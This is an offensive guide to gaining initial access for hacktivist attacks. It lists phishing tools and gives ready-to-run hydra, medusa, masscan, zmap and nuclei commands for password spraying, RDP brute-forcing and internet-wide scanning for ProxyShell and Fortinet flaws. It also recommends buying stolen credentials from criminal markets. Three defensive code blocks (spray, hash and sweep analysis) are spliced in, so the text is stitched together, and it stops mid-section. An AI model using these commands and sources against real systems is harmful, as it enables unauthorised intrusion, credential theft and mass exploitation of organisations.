Initial Access Tactics, techniques and procedures
Phishing
Phishing is the most common attack method favored by advanced persistent threat groups and organized cybercriminal gangs, because it relies on social engineering to trick the target into either downloading a malicious email attachment or clicking a malicious link.
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
- Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | remove the identifying headers gophish adds
- Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
Password Attacks
Groups like Lapsus$ showed the world that you don't need to be a great technical hacker to pwn massive corporations: if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar Games, Okta and so on, then they will work on our hacktivist targets!
If your target uses multi-factor authentication, you can try either social engineering or MFA fatigue.
Username creation based on recon/osint
Create a bespoke username word list based on OSINT, recon and your target's employees' LinkedIn and other social media profiles to aid in your password attacks.
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://bitbucket.org/grimhacker/office365userenum/src/master
- https://github.com/shroudri/username_generator
- https://github.com/digininja/CeWL
Passwords
Common and leaked credentials to test login portals and network services.
Using the SecLists username and password lists, concatenate all username files into one big file and all password files into another:
Usernames:
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt
Passwords:
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/ihebski/DefaultCreds-cheat-sheet
- https://default-password.info
Password cracking tools
- https://www.kali.org/tools/ncrack
- https://www.kali.org/tools/wfuzz
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://www.kali.org/tools/hydra
- https://github.com/1N3/BruteX
- A basic example using a wordlist in the format email:pass or user:pass. To see what the login form data looks like, proxy a test login request through Burp Suite.
hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S
- https://www.kali.org/tools/brutespray
Searching leaks
- https://github.com/khast3x/h8mail [Free but includes paid services]
Services
Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!
You can use services that compile COMBO lists (leaked credentials) to search for your target's domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.
- https://haveibeenpwned.com
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once your leaks have been downloaded, parse the results into the format email:pass.
Password spraying
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords, you can spray them across different services to test whether they have been recycled elsewhere. You can also take common passwords (Spring2023) and spray them, hoping an employee uses a weak and guessable credential.
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
medusa -U usernames.txt -p Spring2023 -H targets.txt -M ssh -O results.txt
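From the defender's side, the sprays described above (one password tried against many accounts with tools like the ones listed) leave a recognisable footprint in authentication logs. The following is an added example, not code from the original page or from any of the listed tools: it classifies each source address as spraying, brute-forcing or normal from a constructed, simplified log format (assumed to be "<ISO timestamp> <OK|FAIL> user=<name> src=<ip>"; real sshd, RDP or Azure AD sign-in logs would need their own parser).

```python
"""Classify authentication sources as password spray, brute force or normal.

Added example, not from the original page. A spray looks different from a
brute force: one source tries many distinct usernames with one or two attempts
each (staying under lockout thresholds), whereas a brute force hammers a single
account. The log lines below are constructed sample data in an assumed
"<ISO timestamp> <OK|FAIL> user=<name> src=<ip>" format.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample: one spraying source, one brute-forcing source, one normal login.
SAMPLE_LOG = """\
2023-03-01T09:00:01 FAIL user=alice src=203.0.113.5
2023-03-01T09:00:02 FAIL user=bob src=203.0.113.5
2023-03-01T09:00:03 FAIL user=carol src=203.0.113.5
2023-03-01T09:00:04 FAIL user=dave src=203.0.113.5
2023-03-01T09:00:05 FAIL user=erin src=203.0.113.5
2023-03-01T09:00:06 OK user=frank src=203.0.113.5
2023-03-01T09:00:07 FAIL user=alice src=198.51.100.7
2023-03-01T09:00:08 FAIL user=alice src=198.51.100.7
2023-03-01T09:00:09 FAIL user=alice src=198.51.100.7
2023-03-01T09:00:10 FAIL user=alice src=198.51.100.7
2023-03-01T09:00:11 FAIL user=alice src=198.51.100.7
2023-03-01T09:00:12 OK user=grace src=192.0.2.9
"""

LINE_RE = re.compile(r"^(\S+) (OK|FAIL) user=(\S+) src=(\S+)$")


def parse_log(text):
    """Yield (timestamp, success, user, src); lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, result, user, src = m.groups()
            yield datetime.fromisoformat(ts), result == "OK", user, src


def classify_sources(text, window=timedelta(minutes=10), min_users=5,
                     max_per_user=2, brute_threshold=5):
    """Return {src: {"verdict", "users", "attempts", "successes"}} per source address.

    Within any `window`-long span starting at one of the source's own events:
      "spray"       -> at least `min_users` distinct users, at most `max_per_user` attempts each
      "brute-force" -> a single user with at least `brute_threshold` attempts
      "normal"      -> anything else
    Successful logins from a flagged source are listed: those accounts get reset first.
    """
    by_src = defaultdict(list)
    for ev in sorted(parse_log(text), key=lambda e: e[0]):
        by_src[ev[3]].append(ev)

    report = {}
    for src, evs in by_src.items():
        for i, (start, _, _, _) in enumerate(evs):
            attempts = defaultdict(int)   # user -> attempts inside this window
            successes = set()
            for ts, ok, user, _ in evs[i:]:
                if ts - start > window:
                    break
                attempts[user] += 1
                if ok:
                    successes.add(user)
            verdict = "normal"
            if len(attempts) >= min_users and max(attempts.values()) <= max_per_user:
                verdict = "spray"
            elif len(attempts) == 1 and max(attempts.values()) >= brute_threshold:
                verdict = "brute-force"
            if verdict != "normal":
                report[src] = {"verdict": verdict, "users": len(attempts),
                               "attempts": sum(attempts.values()),
                               "successes": sorted(successes)}
                break
        else:  # no window was suspicious
            report[src] = {"verdict": "normal", "users": len({e[2] for e in evs}),
                           "attempts": len(evs),
                           "successes": sorted(e[2] for e in evs if e[1])}
    return report


if __name__ == "__main__":
    for src, info in classify_sources(SAMPLE_LOG).items():
        print(src, info)
```

The thresholds are assumptions to tune per environment: a spray by the tools above typically shows as one or two failures per user across dozens or hundreds of users, so counting distinct users per source (not failures per user, which is what lockout policies count) is what surfaces it.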
Hash cracking
Crack password hashes using both online and offline tools!
Identify hash:
Online tools:
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
Offline tools:
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
- https://github.com/NotSoSecure/password_cracking_rules
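Before any hash goes to hashcat or john, its format has to be identified so the right mode is chosen. The following is an added example, not code from the original page or from either tool: a small rule-based identifier that names modular-crypt hashes from their prefix, splits them into parameters, salt and digest, and narrows bare hex digests by length (where several algorithms remain possible, all candidates are returned). The sample values in it are constructed; the one real-looking digest is the well-known MD5 of the string "password".

```python
"""Identify a password hash's format before picking a cracking mode.

Added example, not from the original page. Modular-crypt strings ($6$..., $2b$...)
name their algorithm in a prefix and can be split into parameters, salt and
digest; bare hex digests can only be narrowed by length, so every candidate is
returned (a 32-hex string may be MD5, NTLM, LM or MD4).
"""
import re

# Modular-crypt / LDAP prefixes that unambiguously name the algorithm (assumed list).
PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$argon2id$": "argon2id", "$argon2i$": "argon2i", "$argon2d$": "argon2d",
    "$pbkdf2-sha256$": "pbkdf2-sha256",
    "{SHA}": "ldap-sha1", "{SSHA}": "ldap-ssha1",
}

# Hex digest length -> candidate algorithms; ambiguity is inherent, not a bug.
HEX_LENGTHS = {
    32: ["MD5", "NTLM", "LM", "MD4"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256", "BLAKE2s"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512", "BLAKE2b", "Whirlpool"],
}

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def identify_hash(h):
    """Return the list of candidate formats for `h` (empty if nothing matches)."""
    h = h.strip()
    for prefix, name in PREFIXES.items():
        if h.startswith(prefix):
            return [name]
    if HEX_RE.match(h):
        return list(HEX_LENGTHS.get(len(h), []))
    return []


def parse_crypt(h):
    """Split a modular-crypt string into {"id", "params", "salt", "digest"}.

    Assumed layout: $id$[key=value[,key=value]$...]$salt$digest, with bcrypt's
    special $2x$cost$<22-char salt><31-char digest> handled separately.
    Returns None for strings that are not modular-crypt.
    """
    h = h.strip()
    if not h.startswith("$"):
        return None
    fields = h.split("$")[1:]          # drop the empty element before the first '$'
    ident = fields[0]
    info = {"id": ident, "params": {}, "salt": None, "digest": None}
    if ident in ("2a", "2b", "2y"):
        info["params"]["cost"] = int(fields[1])
        info["salt"], info["digest"] = fields[2][:22], fields[2][22:]
        return info
    rest = fields[1:]
    while rest and "=" in rest[0]:     # parameter fields precede the salt
        for kv in rest[0].split(","):
            key, value = kv.split("=", 1)
            info["params"][key] = value
        rest = rest[1:]
    if len(rest) >= 2:
        info["salt"], info["digest"] = rest[-2], rest[-1]
    return info


if __name__ == "__main__":
    for sample in ("$6$rounds=5000$saltsalt$digestdigest",
                   "5f4dcc3b5aa765d61d8327deb882cf99"):
        print(sample, "->", identify_hash(sample), parse_crypt(sample))
```

The parameters matter for defenders as much as for crackers: a sha512crypt hash with a low rounds value or a bcrypt cost below 10 is cheap to attack, and reading those fields out of a dumped hash is the quickest way to judge exposure.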
Buying access
You can use the Genesis Market to purchase credentials stolen from targets through the use of info stealer malware. Search your target there to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
You can also find access brokers selling network access inside companies on forums. Services include but are not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc.).
- https://xss.is
- https://exploit.in [Free & Paid]
Spray and pray
As seen with Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan the IP ranges of countries of interest, or your target company's IP ranges, for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned for and exploited ProxyShell, yoinked all their targets' emails out of their Microsoft Exchange servers and leaked them. You can do the same! See scanning and recon for tools such as nuclei and the Nmap Scripting Engine (NSE) to vulnerability scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using:
nmap -Pn -sS -R -iL targets.txt -oA results
However, this is also done by default when performing a vulnerability scan using NSE.
IP Ranges:
- List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
- IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country
- Scan the entire internet: 0.0.0.0/0
Vulnerability scanning
Scanning for and exploiting CVE vulnerabilities in public-facing applications.
Tools
Scan IP ranges, output only IPv4 addresses and exclude known honeypots:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
Add the port numbers to the end of discovered IPs in the format: ip-address:443
sed -i 's/$/:443/' results.txt
Vuln scan IPs:
nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt
Exploit: ProxyShell
Scan for multiple different ports:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt
Add unique port numbers to the end of discovered IPs in the format: ip-address:port
awk '{ print $4 ":" $3 }' results.txt > final_results.txt
Vuln scan IPs:
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt
Exploit: Fortinet SSL VPN Path Traversal
Guacamaya scanning for ProxyShell using zmap and NSE:
sudo zmap -q -p 443 | httpx -silent -s -sd -location | awk '/owa/ { print substr($1,9) }' > owa.txt
nmap -p 443 -Pn -n --script http-vuln-exchange-proxyshell.nse -iL owa.txt
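The masscan and zmap sweeps above are loud from the defender's side: one source touches a very large number of distinct destination addresses on a single port in seconds, which no legitimate client does. The following is an added example, not code from the original page or from masscan, zmap or nuclei: it flags such horizontal sweeps in a constructed firewall-style connection log (assumed format "<ISO timestamp> <src_ip> -> <dst_ip>:<dport> <action>"; a real NetFlow or firewall export would need its own parser).

```python
"""Flag horizontal port sweeps (one source, one port, many destination hosts).

Added example, not from the original page. The sample records are constructed
connection-log lines in an assumed "<ISO timestamp> <src> -> <dst>:<dport> <action>"
format: one source sweeps thirty hosts on 443 in thirty seconds, another
makes a handful of ordinary connections.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

SCANNER_LINES = [
    f"2023-03-01T10:00:{i:02d} 198.51.100.20 -> 203.0.113.{i + 1}:443 SYN"
    for i in range(30)
]
NORMAL_LINES = [
    "2023-03-01T10:00:05 192.0.2.10 -> 203.0.113.5:443 SYN",
    "2023-03-01T10:00:06 192.0.2.10 -> 203.0.113.5:443 SYN",
    "2023-03-01T10:00:07 192.0.2.10 -> 203.0.113.6:443 SYN",
    "this line is deliberately malformed and must be skipped",
]
SAMPLE_CONNLOG = "\n".join(SCANNER_LINES + NORMAL_LINES)

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\S+)$")


def parse_connlog(text):
    """Yield (timestamp, src, dst, dport) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, dport, _action = m.groups()
            yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_sweeps(text, window=timedelta(seconds=60), min_hosts=20):
    """Return {(src, dport): {"hosts": n, "rate_per_s": r}} for sweeping sources.

    A (source, port) pair is flagged when some `window`-long span starting at
    one of its own connections reaches at least `min_hosts` distinct destinations.
    The rate is distinct hosts over the span actually covered (at least one second).
    """
    buckets = defaultdict(list)
    for ts, src, dst, dport in parse_connlog(text):
        buckets[(src, dport)].append((ts, dst))

    flagged = {}
    for key, events in buckets.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = set()
            last = start
            for ts, dst in events[i:]:
                if ts - start > window:
                    break
                seen.add(dst)
                last = ts
            if len(seen) >= min_hosts:
                span = max((last - start).total_seconds(), 1.0)
                flagged[key] = {"hosts": len(seen), "rate_per_s": round(len(seen) / span, 2)}
                break
    return flagged


if __name__ == "__main__":
    for (src, port), info in find_sweeps(SAMPLE_CONNLOG).items():
        print(f"{src} swept {info['hosts']} hosts on port {port} at {info['rate_per_s']}/s")
```

Grouping by (source, port) rather than by source alone is what distinguishes a sweep for one service (the -p443 or -p3389 scans above) from a single host being port-scanned; the latter would show up as one destination and many ports, and is a separate rule. The thresholds are assumptions; on a real perimeter log, sources that sweep a whole range in seconds are the ones to rate-limit or drop before the follow-up vulnerability scan arrives.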
Password spray and pray
You can perform these attacks against protocols such as SSH, RDP, VPN, FTP, Telnet, VNC and MySQL.
Tools
Scan your target(s) for RDP (3389):
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt
Now use RDP cracking tools against discovered IPs.
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results
VPN Brute forcing: